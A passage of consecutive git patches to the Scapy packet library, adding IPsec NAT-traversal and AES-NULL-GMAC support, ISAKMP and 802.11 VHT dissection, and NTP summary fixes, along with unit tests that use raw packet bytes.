-bind_top_down(UDP, NON_ESP, dport=4500, sport=4500) -bind_top_down(UDP, NAT_KEEPALIVE, dport=4500, sport=4500) +split_bottom_up(NON_ESP, ISAKMP) +bind_bottom_up(NON_ESP, IKEv2) def ikev2scan(ip, **kwargs): diff --git a/scapy/fields.py b/scapy/fields.py index a13e19d39f4..e7033a17885 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -1971,6 +1971,21 @@ class StrLenFieldUtf16(StrLenField, StrFieldUtf16): pass +class StrLenEnumField(_StrEnumField, StrLenField): + __slots__ = ["enum"] + + def __init__( + self, + name, # type: str + default, # type: bytes + enum=None, # type: Optional[Dict[str, str]] + **kwargs # type: Any + ): + # type: (...) -> None + StrLenField.__init__(self, name, default, **kwargs) + self.enum = enum + + class BoundStrLenField(StrLenField): __slots__ = ["minlen", "maxlen"] diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index 705fc18e7f1..84ce9a48adf 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -43,9 +43,25 @@ from scapy.compat import orb, raw from scapy.data import IP_PROTOS from scapy.error import log_loading -from scapy.fields import ByteEnumField, ByteField, IntField, PacketField, \ - ShortField, StrField, XIntField, XStrField, XStrLenField -from scapy.packet import Packet, bind_layers, Raw +from scapy.fields import ( + ByteEnumField, + ByteField, + IntField, + PacketField, + ShortField, + StrField, + XByteField, + XIntField, + XStrField, + XStrLenField, +) +from scapy.packet import ( + Packet, + Raw, + bind_bottom_up, + bind_layers, + bind_top_down, +) from scapy.layers.inet import IP, UDP import scapy.libs.six as six from scapy.layers.inet6 import IPv6, IPv6ExtHdrHopByHop, IPv6ExtHdrDestOpt, \ @@ -115,6 +131,17 @@ class ESP(Packet): XStrField('data', None), ] + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt: + if len(_pkt) >= 4 and struct.unpack("!I", _pkt[0:4])[0] == 0x00: + return NON_ESP + elif len(_pkt) == 1 and struct.unpack("!B", _pkt)[0] == 0xff: + return NAT_KEEPALIVE + else: + return ESP + return cls + overload_fields = { IP: {'proto': socket.IPPROTO_ESP}, IPv6: {'nh': socket.IPPROTO_ESP}, @@ -124,10 +151,27 @@ class ESP(Packet): } +class NON_ESP(Packet): # RFC 3948, section 2.2 + fields_desc = [ + XIntField("non_esp", 0x0) + ] + + +class NAT_KEEPALIVE(Packet): # RFC 3948, section 2.2 + fields_desc = [ + XByteField("nat_keepalive", 0xFF) + ] + + bind_layers(IP, ESP, proto=socket.IPPROTO_ESP) bind_layers(IPv6, ESP, nh=socket.IPPROTO_ESP) -bind_layers(UDP, ESP, dport=4500) # NAT-Traversal encapsulation -bind_layers(UDP, ESP, sport=4500) # NAT-Traversal encapsulation + +# NAT-Traversal encapsulation +bind_bottom_up(UDP, ESP, dport=4500) +bind_bottom_up(UDP, ESP, sport=4500) +bind_top_down(UDP, ESP, dport=4500, sport=4500) +bind_top_down(UDP, NON_ESP, dport=4500, sport=4500) +bind_top_down(UDP, NAT_KEEPALIVE, dport=4500, sport=4500) ############################################################################### diff --git a/scapy/layers/isakmp.py b/scapy/layers/isakmp.py index af3331d63e3..001728195d5 100644 --- a/scapy/layers/isakmp.py +++ b/scapy/layers/isakmp.py @@ -19,16 +19,21 @@ FieldLenField, FieldListField, FlagsField, + IPField, IntEnumField, IntField, + MultipleTypeField, PacketLenField, ShortEnumField, ShortField, - StrFixedLenField, + StrLenEnumField, StrLenField, XByteField, + XStrFixedLenField, + XStrLenField, ) from scapy.layers.inet import IP, UDP +from scapy.layers.ipsec import NON_ESP from scapy.sendrecv import sr from scapy.volatile import RandString from scapy.error import warning @@ -141,16 +146,24 @@ ISAKMPTransformNum = _rev(ISAKMPAttributeTypes) IPSECTransformNum = _rev(IPSECAttributeTypes) +# See IPSEC Security Protocol Identifiers entry in +# https://www.iana.org/assignments/isakmp-registry/isakmp-registry.xhtml#isakmp-registry-3 +PROTO_ISAKMP = 1 +PROTO_IPSEC_AH = 2 +PROTO_IPSEC_ESP = 3 +PROTO_IPCOMP = 4 +PROTO_GIGABEAM_RADIO = 5 + class ISAKMPTransformSetField(StrLenField): islist = 1 @staticmethod - def type2num(type_val_tuple, doi=0): + def type2num(type_val_tuple, proto=0): typ, val = type_val_tuple - if doi == 0: + if proto == PROTO_ISAKMP: type_val, enc_dict, tlv = ISAKMPAttributeTypes.get(typ, (typ, {}, 0)) - elif doi == 1: + elif proto == PROTO_IPSEC_ESP: type_val, enc_dict, tlv = IPSECAttributeTypes.get(typ, (typ, {}, 0)) else: type_val, enc_dict, tlv = (typ, {}, 0) @@ -172,30 +185,30 @@ def type2num(type_val_tuple, doi=0): return struct.pack("!HH", type_val, val) + s @staticmethod - def num2type(typ, enc, doi=0): - if doi == 0: + def num2type(typ, enc, proto=0): + if proto == PROTO_ISAKMP: val = ISAKMPTransformNum.get(typ, (typ, {})) - elif doi == 1: + elif proto == PROTO_IPSEC_ESP: val = IPSECTransformNum.get(typ, (typ, {})) else: val = (typ, {}) enc = val[1].get(enc, enc) return (val[0], enc) - def _get_doi(self, pkt): + def _get_proto(self, pkt): # Ugh cur = pkt - while cur and getattr(cur, "doi", None) is None: + while cur and getattr(cur, "proto", None) is None: cur = cur.parent or cur.underlayer if cur is None: - return 0 - return cur.doi + return PROTO_ISAKMP + return cur.proto def i2m(self, pkt, i): if i is None: return b"" - doi = self._get_doi(pkt) - i = [ISAKMPTransformSetField.type2num(e, doi=doi) for e in i] + proto = self._get_proto(pkt) + i = [ISAKMPTransformSetField.type2num(e, proto=proto) for e in i] return b"".join(i) def m2i(self, pkt, m): @@ -205,7 +218,7 @@ def m2i(self, pkt, m): # worst case that should result in broken attributes (which would # be expected). (wam) lst = [] - doi = self._get_doi(pkt) + proto = self._get_proto(pkt) while len(m) >= 4: trans_type, = struct.unpack("!H", m[:2]) is_tlv = not (trans_type & 0x8000) @@ -223,7 +236,7 @@ def m2i(self, pkt, m): value_len = 0 value, = struct.unpack("!H", m[2:4]) m = m[4 + value_len:] - lst.append(ISAKMPTransformSetField.num2type(trans_type, value, doi=doi)) + lst.append(ISAKMPTransformSetField.num2type(trans_type, value, proto=proto)) if len(m) > 0: warning("Extra bytes after ISAKMP transform dissection [%r]" % m) return lst @@ -252,11 +265,18 @@ def m2i(self, pkt, m): 2: "identity protection", 3: "authentication only", 4: "aggressive", - 5: "informational" + 5: "informational", + 32: "quick mode", } +# https://www.iana.org/assignments/isakmp-registry/isakmp-registry.xhtml#isakmp-registry-3 +# IPSEC Security Protocol Identifiers ISAKMP_protos = { 1: "ISAKMP", + 2: "IPSEC_AH", + 3: "IPSEC_ESP", + 4: "IPCOMP", + 5: "GIGABEAM_RADIO" } ISAKMP_doi = { @@ -277,8 +297,8 @@ def default_payload_class(self, payload): class ISAKMP(_ISAKMP_class): # rfc2408 name = "ISAKMP" fields_desc = [ - StrFixedLenField("init_cookie", "", 8), - StrFixedLenField("resp_cookie", "", 8), + XStrFixedLenField("init_cookie", "", 8), + XStrFixedLenField("resp_cookie", "", 8), ByteEnumField("next_payload", 0, ISAKMP_payload_type), XByteField("version", 0x10), ByteEnumField("exch_type", 0, ISAKMP_exchange_type), @@ -309,11 +329,12 @@ def post_build(self, p, pay): class ISAKMP_payload(_ISAKMP_class): name = "ISAKMP payload" + show_indent = 0 fields_desc = [ ByteEnumField("next_payload", None, ISAKMP_payload_type), ByteField("res", 0), ShortField("length", None), - StrLenField("load", "", length_from=lambda x:x.length - 4), + XStrLenField("load", "", length_from=lambda x:x.length - 4), ] def post_build(self, pkt, pay): @@ -356,8 +377,25 @@ class ISAKMP_payload_Proposal(ISAKMP_payload): ] +# VendorID: https://www.rfc-editor.org/rfc/rfc2408#section-3.16 + +# packet-isakmp.c from wireshark +ISAKMP_VENDOR_IDS = { + b"\x09\x00\x26\x89\xdf\xd6\xb7\x12": "XAUTH", + b"\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\x00": "RFC 3706 DPD", + b"@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\x00\xd6\xc2\xd3\x80": "Cisco Fragmentation", + b"J\x13\x1c\x81\x07\x03XE\\W(\xf2\x0e\x95E/": "RFC 3947 Negotiation of NAT-Transversal", # noqa: E501 + b"\x90\xcb\x80\x91>\xbbin\x08c\x81\xb5\xecB{\x1f": "draft-ietf-ipsec-nat-t-ike-02", +} + + class ISAKMP_payload_VendorID(ISAKMP_payload): name = "ISAKMP Vendor ID" + fields_desc = ISAKMP_payload.fields_desc[:3] + [ + StrLenEnumField("VendorID", b"", + ISAKMP_VENDOR_IDS, + length_from=lambda x: x.length - 4) + ] class ISAKMP_payload_SA(ISAKMP_payload): @@ -380,11 +418,22 @@ class ISAKMP_payload_KE(ISAKMP_payload): class ISAKMP_payload_ID(ISAKMP_payload): name = "ISAKMP Identification" fields_desc = ISAKMP_payload.fields_desc[:3] + [ - ByteEnumField("IDtype", 1, {1: "IPv4_addr", 11: "Key"}), + ByteEnumField("IDtype", 1, { + # Beware, apparently in-the-wild the values used + # appear to be the ones from IKEv2 (RFC4306 sect 3.5) + # and not ISAKMP (RFC2408 sect A.4) + 1: "IPv4_addr", + 11: "Key" + }), ByteEnumField("ProtoID", 0, {0: "Unused"}), ShortEnumField("Port", 0, {0: "Unused"}), - # IPField("IdentData","127.0.0.1"), - StrLenField("load", "", length_from=lambda x: x.length - 8), + MultipleTypeField( + [ + (IPField("IdentData", "127.0.0.1"), + lambda pkt: pkt.IDtype == 1), + ], + StrLenField("IdentData", "", length_from=lambda x: x.length - 8), + ) ] @@ -459,6 +508,8 @@ class ISAKMP_payload_Delete(ISAKMP_payload): bind_bottom_up(UDP, ISAKMP, sport=500) bind_top_down(UDP, ISAKMP, dport=500, sport=500) +bind_bottom_up(NON_ESP, ISAKMP) + # Add bindings bind_top_down(_ISAKMP_class, ISAKMP_payload, next_payload=0) bind_layers(_ISAKMP_class, ISAKMP_payload_SA, next_payload=1) diff --git a/test/scapy/layers/isakmp.uts b/test/scapy/layers/isakmp.uts index 4e20653fe90..ea35d58eae2 100644 --- a/test/scapy/layers/isakmp.uts +++ b/test/scapy/layers/isakmp.uts @@ -6,6 +6,50 @@ + ISAKMP tests ~ ISAKMP += ISAKMP - Phase 1 - Aggressive Security Association dissection +pkt = UDP(b'\x01\xf4\x01\xf4\x02\xf0\x01\xca/\xa8\xd0\xc9\x15zT\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x04\x00\x00\x00\x00\x00\x00\x00\x02\xe8\x04\x00\x008\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00,\x01\x01\x00\x01\x00\x00\x00$\x01\x01\x00\x00\x80\x01\x00\x07\x80\x0e\x00\x80\x80\x02\x00\x01\x80\x04\x00\x10\x80\x03\x00\x01\x80\x0b\x00\x01\x80\x0c\x00\x84\n\x00\x02\x04n[}p2s\xf3\x91H=\xea\xafhV\xb1\xec\x01\xf0\x1b\xdfG[\x1c\xbd\x07\xa6\xb7\xe9\xc6P2i\\\xbd\xdf\xefI\xe1\\\x04\xd8L\xdd\xbb7\xc8,\xd0G\x12x\x82t\x9f\x8c\xee\xcd\xad\x16P\x7f%\xc6|G\xf2\x8f\x14\xa7\xa0w\x1ax\x87\x8b\x80\xaa\xf2\x0b\x82\xb5k\xcc\xcb\xdb5\xc0j\xc0\xb1\xd2\x0e\xb3\x05\xd3\x9d\x0bY\xb4}[~\n,W;]\xe0|\x08\xed\xe6\xb4\x82QoDE\xa7\xd5\x91\x92j@\xa1vb\xdd\xc3\xc8%\x81\xaf\xcd\xc2$V\xd90d\xc4\x06$\xd1\xce\x92\xe0:\x0fQ\xa2\xdb\xd8\x11\xaf\xf5\xeb\xde\xbcih\xc1n\x80\xe4\x8a\t\xa2\xcd{\x7f\xa3\t)\x9b\xbc\xe2v3\xa6>9\x87D"\x1a9\xad\x9b\x16q\xbe\x02\xb0\x1f/\xe6\xd7\x81\xeb\x98j\x91\xdf\xabf\xa9M+1\xdc\xc5\xc5\xd71\xc7\x11\xc5\xdcU\xe9L\x10\x9f\x00\xc2\x97S\x90\'\xa8\xd6dNy})F\x99Z\x82\xa7\x1a\t\x03\xa4\xe5\xb5M\x9b$\x9a\x10fX\x10\xa6\xc6\xdf#\xe1\xc7E2\xdf\xc2\x1d}\xd7\x90820b\xcd`\xc7\x1f\xca\xde\xa0\xd7\xb6\x87\xe4\xad\xc4-\xe9\xce\xd9Rx\xc8\xab\xeaI+;\x07\x07-\xaa\xb4\xa2\xd1\xd7-\xe0\x85\x93\xbe\x1dqw\xff\x17\x97\xecku\xf3H%\x9e\x95,W\xa7\xbaU\xc7*\xcd!\xdb\x83\x8dNv~\x1cq\xc8~S\xd1"\xbf\x03(\xac\xf5\xec\xeb+*\xfd:\x9d.h\xcb\x15;\xf1_E\x02(:\xab\xa0}d\xb2\xce\x1d\xff4\xc7\x15{\x80Iy.\t7\x96\x95\x96\xda\x1f\xcf\xab\x03P=\xd0\t\x05!\x904\xaf\xdb\xfa\xcc6k"\xffB##\x8a\xacWx\xf3J\xe6[\xe0\x80\x0b\xc8\x9a\x9a\x87gS\xac\xd6<\r\x1f\x10%\x14\x90}\x94m\xd78$\x95\xf3>>i\x15\x1f\x9ax\x00\xbc\x14\xcf\xd0\xbe;XLl\xfa\xa1\x8f\x8c\xa6\xc5\x03\xcd\xc38\xf6\xb3V\xf0|5&\xf7\xb3\x99\x8f\x81\x9a\x93G\xf3\xf4S\xddl\x08-\xec\xa2\x87\xcf\x14x\xdc\xef\x0326\x82J\x05\x00\x00$\xb0G9\xbdI[@\xedT\x81\xa0\xe5\\]\xd2\x03}+\x1c\xfd\x1b\x88\xed\xa5\xb0y\xfd\x8d&\xe3\x08\x98\r\x00\x00\x0c\x01\x00\x00\x00\x02\x02\x02\x02\r\x00\x00\x0c\t\x00&\x89\xdf\xd6\xb7\x12\r\x00\x00\x14\xaf\xca\xd7\x13h\xa1\xf1\xc9k\x86\x96\xfcwW\x01\x00\r\x00\x00\x18@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\x00\xd6\xc2\xd3\x80\x00\x00\x00\r\x00\x00\x14J\x13\x1c\x81\x07\x03XE\\W(\xf2\x0e\x95E/\x00\x00\x00\x14\x90\xcb\x80\x91>\xbbin\x08c\x81\xb5\xecB{\x1f') + +assert pkt.prop.proto == 1 +assert pkt.prop.trans.transforms == [ + ('Encryption', 'AES-CBC'), + ('KeyLength', 128), + ('Hash', 'MD5'), + ('GroupDesc', '4096MODPgr'), + ('Authentication', 'PSK'), + ('LifeType', 'Seconds'), + ('LifeDuration', 132) +] +assert ISAKMP_payload_KE in pkt +assert pkt[ISAKMP_payload_KE].length == 516 +assert len(pkt[ISAKMP_payload_KE].load) == 512 +assert ISAKMP_payload_ID in pkt +assert pkt[ISAKMP_payload_ID].IdentData == "2.2.2.2" +assert pkt.getlayer(ISAKMP_payload_VendorID, 5) + += ISAKMP - Over NAT-Transversal - dissection +pkt = UDP(b'\x11\x94\x11\x94\x01H4\xea\x00\x00\x00\x00/\xa8\xd0\xc9\x15zT\xc0\x95Y\x06\xaf\x97\x1fd\x8d\x08\x10 \x01\xa8!\x97U\x00\x00\x01<\xc8\xba\x8434r\xf8\xc5J\x84W:v4\x1e\x05\x10\xcc.\xd8\xb6\tC\x01~\xad\xd7l\x9c^\x06\tc\xadL\xc4\xc6\xd0P\x98\xb1~\x05\x07\xa0\x0b2&\x05\xa7\xa3\x8c*: \xbe\xa4F\x9d\xa5\xa9\xf7T\x88.\xa9\xe1K\xa29N3%\x19\x80\xd8!\x12^)\x1cJt\xfb\xe1\xca\xab\xb5\xf2\x01\xe83T\x0f\xd4\xfd\xb6\xc4\xe4z\x03`\xd0t\xbc3\xa9\x9b\x8d\xac\x89\x7f\xad\xc2|\x82\x8a\xe4`d\xe6I\xfcVS\x17c7\xce\x13\xd0\x1b\x05\x00\x00\x84\x80\x9cNz\x14\x93\xe7\xb1\x03\x97y\x16\x1f/\x08\x98uE}\xc0\xc3\xe3\x18c\x80w\x13\xad\x96\xe2N*+d%\x9d7\xff\xf1\xd4\xb21\xca\x19E\x98\x96Xil\xf0\x7fN\x80\xf8qc\x10\x96M}\xa5_\x06\xf4"A1\xd5%{\xab\x1ePc\xfa\xa0n\x1c\xd3R\xaeT\x87d\x86\xdf,?\x9e\x88\xb5l\xfaI\xc2v\xcb\xf6\xae1\\i\x07\xf5\xac]@9\xd3\xd7\x8a\xc0\xda\xde\xb2\x97\x8b\x7f\xe8\xfa\xa5V\x80\x0c\xf0o\x0b\x05\x00\x00\x10\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') +assert ISAKMP_payload_SA in pkt +assert pkt[ISAKMP_payload_SA].prop.proto == 3 +assert pkt[ISAKMP_payload_SA].prop.trans.transforms == [ + ('AuthenticationAlgorithm', 'HMAC-SHA'), + ('GroupDesc', '1024MODPgr'), + ('EncapsulationMode', 'Tunnel'), + ('LifeType', 'seconds'), + ('LifeDuration', 33) +] +assert ISAKMP_payload_ID in pkt + = ISAKMP_payload_Transform p=IP(src='192.168.8.14',dst='10.0.0.1')/UDP()/ISAKMP()/ISAKMP_payload_SA(doi=0, prop=ISAKMP_payload_Proposal(trans=ISAKMP_payload_Transform(transforms=[('Encryption', 'AES-CBC'), ('Hash', 'MD5'), ('Authentication', 'PSK'), ('GroupDesc', '1536MODPgr'), ('KeyLength', 256), ('LifeType', 'Seconds'), ('LifeDuration', 86400)])/ISAKMP_payload_Transform(res2=12345,transforms=[('Encryption', '3DES-CBC'), ('Hash', 'SHA'), ('Authentication', 'PSK'), ('GroupDesc', '1024MODPgr'), ('LifeType', 'Seconds'), ('LifeDuration', 86400)]))) From 9e146f01cf1db3f7589e5f0b1fdae9efbe1fc6da Mon Sep 17 00:00:00 2001 From: Atakan Isbakan Date: Tue, 31 Jan 2023 17:46:20 +0300 Subject: [PATCH 0994/1632] Add 802.11 VHT Operation Info - 802.11-2016 9.4.2.159 - Add unit test --- scapy/layers/dot11.py | 34 ++++++++++++++++++++++++++++++++++ test/scapy/layers/dot11.uts | 12 ++++++++++++ 2 files changed, 46 insertions(+) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 105d14a9954..cd5d9dd0efc 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -971,6 +971,7 @@ def network_stats(self): 107: "Interworking", 127: "Extendend Capabilities", 191: "VHT Capabilities", + 192: "VHT Operation", 221: "Vendor Specific" } @@ -1466,6 +1467,39 @@ class Dot11EltOBSS(Dot11Elt): ] +# 802.11-2016 9.4.2.159 + +class Dot11VHTOperationInfo(Packet): + name = "802.11 VHT Operation Information" + fields_desc = [ + ByteField("channel_width", 0), + ByteField("channel_center0", 36), + ByteField("channel_center1", 0), + ] + + def extract_padding(self, s): + return "", s + + +class Dot11EltVHTOperation(Dot11Elt): + name = "802.11 VHT Operation Element" + fields_desc = [ + ByteEnumField("ID", 192, _dot11_id_enum), + ByteField("len", 5), + PacketField( + "VHT_Operation_Info", + Dot11VHTOperationInfo(), + Dot11VHTOperationInfo + ), + FieldListField( + "mcs_set", + [0x00], + BitField('SS', 0x00, size=2), + count_from=lambda x: 8 + ) + ] + + ###################### # 802.11 Frame types # ###################### diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index ac9e5f0d241..a1570e27170 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -729,3 +729,15 @@ assert pkt[Dot11EltOBSS].Passive_Total_Per_Channel == 200 assert pkt[Dot11EltOBSS].Active_Total_Per_Channel == 20 assert pkt[Dot11EltOBSS].Delay == 5 assert pkt[Dot11EltOBSS].Activity_Threshold == 25 + += Dot11VHTOperation + +pkt = RadioTap(b"\x00\x008\x00/@@\xa0 \x08\x00\xa0 \x08\x00\x00K\x1178\x00\x00\x00\x00\x10\x0c<\x14@\x01\xba\x00\x00\x00\x00\x00\x00\x00\x00\x00\xffj78\x00\x00\x00\x00\x16\x00\x11\x03\xb6\x00\xba\x01\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff`\x8d&\xa6\xd6\x05`\x8d&\xa6\xd6\x05\xb0i~\x96\x9e\x03\x00\x00\x00\x00d\x00\x11\x11\x00\rArc-QA-Lab-5G\x01\x08\x8c\x12\x98$\xb0H`l\x05\x04\x00\x03\x00\x00\x07 Date: Sat, 25 Mar 2023 14:49:02 +0100 Subject: [PATCH 0995/1632] Remove wrong debug message from Automotive Scanner Executor (#3931) --- scapy/contrib/automotive/scanner/executor.py | 1 - 1 file changed, 1 deletion(-) diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index aee6c71c132..ea1f3bb5d67 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -262,7 +262,6 @@ def scan(self, timeout=None): kill_time = None else: kill_time = time.monotonic() + timeout - log_automotive.debug("Set kill_time to %s" % time.ctime(kill_time)) while kill_time is None or kill_time > time.monotonic(): test_case_executed = False log_automotive.info("[i] Scan progress %0.2f", self.progress()) From c456201a5a0cf622ab2f719405e056b4b22a17ec Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sat, 25 Mar 2023 16:56:42 +0300 Subject: [PATCH 0996/1632] Show NTP version and mode instead of question marks (#3944) In 1e48e13fc594f8d925451c7e2706086d21102716 NTP switched to dispatch_hook and all the fields including "version" and "mode" moved to the NTP subclasses. This PR adjusts the mysummary method accordingly. With this patch applied tshark() prints something like ``` 17 Ether / IP / UDP / NTP v4, client 18 Ether / IP / UDP / NTP v4, server ``` instead of ``` 17 Ether / IP / UDP / NTP v??, ?? 18 Ether / IP / UDP / NTP v??, ?? ``` It's a follow-up to 1e48e13fc594f8d925451c7e2706086d21102716 --- scapy/layers/ntp.py | 8 +++++--- test/scapy/layers/ntp.uts | 3 +++ 2 files changed, 8 insertions(+), 3 deletions(-) diff --git a/scapy/layers/ntp.py b/scapy/layers/ntp.py index 1521bc5ded6..9c6620b7022 100644 --- a/scapy/layers/ntp.py +++ b/scapy/layers/ntp.py @@ -209,7 +209,9 @@ def pre_dissect(self, s): return s def mysummary(self): - return self.sprintf("NTP v%ir,NTP.version%, %NTP.mode%") + return self.sprintf( + "NTP v%ir,{0}.version%, %{0}.mode%".format(self.__class__.__name__) + ) class _NTPAuthenticatorPaddingField(StrField): @@ -795,7 +797,7 @@ class NTPControl(NTP): fields_desc = [ BitField("zeros", 0, 2), BitField("version", 2, 3), - BitField("mode", 6, 3), + BitEnumField("mode", 6, 3, _ntp_modes), BitField("response", 0, 1), BitField("err", 0, 1), BitField("more", 0, 1), @@ -1777,7 +1779,7 @@ class NTPPrivate(NTP): BitField("response", 0, 1), BitField("more", 0, 1), BitField("version", 2, 3), - BitField("mode", 0, 3), + BitEnumField("mode", 7, 3, _ntp_modes), BitField("auth", 0, 1), BitField("seq", 0, 7), ByteEnumField("implementation", 0, _implementations), diff --git a/test/scapy/layers/ntp.uts b/test/scapy/layers/ntp.uts index 7a939bfdadd..8290d170199 100644 --- a/test/scapy/layers/ntp.uts +++ b/test/scapy/layers/ntp.uts @@ -24,16 +24,19 @@ assert NTPHeader in p assert not NTPControl in p assert not NTPPrivate in p assert NTP in p +assert p.mysummary() == "NTP v4, client" p = NTPControl() assert not NTPHeader in p assert NTPControl in p assert not NTPPrivate in p assert NTP in p +assert p.mysummary() == "NTP v2, NTP control message" p = NTPPrivate() assert not NTPHeader in p assert not NTPControl in p assert NTPPrivate in p assert NTP in p +assert p.mysummary() == "NTP v2, reserved for private use" = NTP - Layers (2) p = NTPHeader() From 358f5465ddbf6149bcfe9cad8fef2f4b925dd173 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Beno=C3=AEt=20Ganne?= Date: Sat, 25 Mar 2023 16:25:32 +0100 Subject: [PATCH 0997/1632] Add RFC-4543 AES-NULL-GMAC support to IPSec layer (#3935) * Add RFC-4543 AES-NULL-GMAC support to IPSec layer * Minor cleanups --------- Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/layers/ipsec.py | 23 ++++- test/scapy/layers/ipsec.uts | 177 ++++++++++++++++++++++++++++++++++++ 2 files changed, 198 insertions(+), 2 deletions(-) diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index 84ce9a48adf..5305f2604a1 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -413,7 +413,11 @@ def encrypt(self, sa, esp, key, icv_size=None, esn_en=False, esn=0): cipher = self.cipher(key, tag_length=icv_size) else: cipher = self.cipher(key) - data = cipher.encrypt(mode_iv, data, aad) + if self.name == 'AES-NULL-GMAC': + # Special case for GMAC (rfc 4543 sect 3) + data = data + cipher.encrypt(mode_iv, b"", aad + esp.iv + data) + else: + data = cipher.encrypt(mode_iv, data, aad) else: cipher = self.new_cipher(key, mode_iv) encryptor = cipher.encryptor() @@ -465,7 +469,11 @@ def decrypt(self, sa, esp, key, icv_size=None, esn_en=False, esn=0): else: cipher = self.cipher(key) try: - data = cipher.decrypt(mode_iv, data + icv, aad) + if self.name == 'AES-NULL-GMAC': + # Special case for GMAC (rfc 4543 sect 3) + data = data + cipher.decrypt(mode_iv, icv, aad + iv + data) + else: + data = cipher.decrypt(mode_iv, data + icv, aad) except InvalidTag as err: raise IPSecIntegrityError(err) else: @@ -528,6 +536,17 @@ def decrypt(self, sa, esp, key, icv_size=None, esn_en=False, esn=0): iv_size=8, icv_size=16, format_mode_iv=_salt_format_mode_iv) + # GMAC: rfc 4543, "companion to the AES Galois/Counter Mode ESP" + # This is defined as a crypt_algo by rfc, but has the role of an auth_algo + CRYPT_ALGOS['AES-NULL-GMAC'] = CryptAlgo('AES-NULL-GMAC', + cipher=aead.AESGCM, + key_size=(16, 24, 32), + mode=None, + salt_size=4, + block_size=1, + iv_size=8, + icv_size=16, + format_mode_iv=_salt_format_mode_iv) CRYPT_ALGOS['AES-CCM'] = CryptAlgo('AES-CCM', cipher=aead.AESCCM, mode=None, diff --git a/test/scapy/layers/ipsec.uts b/test/scapy/layers/ipsec.uts index abdbb27fe39..39697a40eca 100644 --- a/test/scapy/layers/ipsec.uts +++ b/test/scapy/layers/ipsec.uts @@ -1683,6 +1683,183 @@ try: except IPSecIntegrityError as err: err +####################################### += IPv4 / ESP - Transport - AES-NULL-GMAC - NULL + +p = IP(src='1.1.1.1', dst='2.2.2.2') +p /= TCP(sport=45012, dport=80) +p /= Raw('testdata') +p = IP(raw(p)) +p + +sa = SecurityAssociation(ESP, spi=0x222, + crypt_algo='AES-NULL-GMAC', crypt_key=b'16bytekey+4bytenonce', + auth_algo='NULL', auth_key=None) + +e = sa.encrypt(p) +e + +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi +* AES-NULL-GMAC is integrity only, the original packet payload should be readable +assert b'testdata' in e[ESP].data + +d = sa.decrypt(e) +d + +* after decryption original packet should be preserved +assert d[TCP] == p[TCP] + +# Generated with Linux 5.15.0-1034-azure #41-Ubuntu +# ip xfrm state add src 10.125.0.2 dst 10.125.0.1 proto esp spi 0x222 reqid 1 \ +# mode tunnel aead 'rfc4543(gcm(aes))' '0x3136627974656b65792b34627974656e6f6e6365' 128 flag align4 +ref = IP() \ + / ESP(spi=0x222, + data=b'\x54\x70\x6c\x6a\x9f\xba\xa6\x18\x45\x00\x00\x54\xbc\x53\x00\x00' + b'\x40\x01\xa9\x59\x0a\x7d\x00\x01\x0a\x7d\x00\x02\x00\x00\xad\x53' + b'\xa8\x83\x00\x01\x02\xe6\x09\x64\x00\x00\x00\x00\xd9\x0a\x06\x00' + b'\x00\x00\x00\x00\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b' + b'\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b' + b'\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x01\x02\x02\x04' + b'\x9b\x76\x32\x30\xf6\x49\x92\xa8\x8f\x6a\x20\x87\x2c\x74\x0c\x18', + seq=22) + +d_ref = sa.decrypt(ref) +d_ref + +* Check for ICMP layer in decrypted reference +assert d_ref.haslayer(ICMP) + +####################################### += IPv4 / ESP - Transport - AES-NULL-GMAC - NULL -- ESN + +p = IP(src='1.1.1.1', dst='2.2.2.2') +p /= TCP(sport=45012, dport=80) +p /= Raw('testdata') +p = IP(raw(p)) +p + +sa = SecurityAssociation(ESP, spi=0x222, + crypt_algo='AES-NULL-GMAC', crypt_key=b'16bytekey+4bytenonce', + auth_algo='NULL', auth_key=None, esn_en = True, esn = 0x1) + +e = sa.encrypt(p) +e + +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +assert e.proto == socket.IPPROTO_ESP +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi +* AES-NULL-GMAC is integrity only, the original packet payload should be readable +assert b'testdata' in e[ESP].data + +d = sa.decrypt(e) +d + +* after decryption original packet should be preserved +assert d[TCP] == p[TCP] + +# Generated with Linux 5.15.0-1034-azure #41-Ubuntu +# ip xfrm state add src 10.125.0.2 dst 10.125.0.1 proto esp spi 0x222 reqid 1 